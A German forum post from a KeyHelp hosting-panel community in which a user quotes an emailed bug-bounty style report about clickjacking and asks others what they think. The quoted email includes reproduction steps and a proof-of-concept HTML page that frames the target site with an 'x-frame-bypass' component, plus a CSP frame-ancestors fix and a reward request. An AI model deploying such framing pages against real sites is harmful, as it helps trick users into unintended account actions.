Vulnerability Report [X-frame By-Pass]
Posted: Mon 7. Nov 2022, 15:02
Liebe KeyHelp-Freunde,
heute habe ich eine Mail bekommen, die auf eine angebliche Sicherheitslücke in Verbindung mit KeyHelp hinweisen würde:
Was meint ihr dazu?
LG von
Hahni
heute habe ich eine Mail bekommen, die auf eine angebliche Sicherheitslücke in Verbindung mit KeyHelp hinweisen würde:
Code: Select all
Hello Team,
I have found a bug in your website https://server.de/
The details of it are as follows:-
Summary:
X-Frame-Options ALLOW-FROM https://server.de/ not supported by several Browser,
Steps To Reproduce:
Create a new HTML file
Put <iframe src="https://server.de/ frameborder="0"></iframe>
Save the file
Open document in browser
Impact:
Attacker may tricked user, sending them malicious link then user open it clicked some image and their account unconsciously has been deactivated
Solution:
The vulnerability can be fixed by adding "frame-ancestors 'self';" to the CSP (Content-Security-Policy) header.
PoC:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="X-Frame-Bypass: Web Component extending IFrame to bypass X-Frame-Options: deny/sameorigin">
<title>X-Frame-Bypass Web Component Demo</title>
<style>
html, body {
margin: 0;
padding: 0;
height: 100%;
overflow: hidden;
}
iframe {
display: block;
width: calc(70% - 40px);
height: calc(80% - 40px);
margin: 20px;
}
img {
position: absolute;
top: 0;
right: 0;
}
</style>
<script src="https://unpkg.com/@ungap/custom-elements-builtin"></script>
<script src="x-frame-bypass.js" type="module"></script>
</head>
<body>
<h1>x-frame-bypass in your site</h1>
<iframe is="x-frame-bypass" src="https://server.de/"></iframe>
</body>
</html>
FIX:
Content-Security-Policy: frame-ancestors 'self' is better, because it checks all frame ancestors. You should implement a CSP header to avoid these sorts of attacks. Please let me know if you want more information. I hope that you appreciate my ethical disclosure of this vulnerability, expecting a reward as a token of appreciation for this..
Thank you!
LG von
Hahni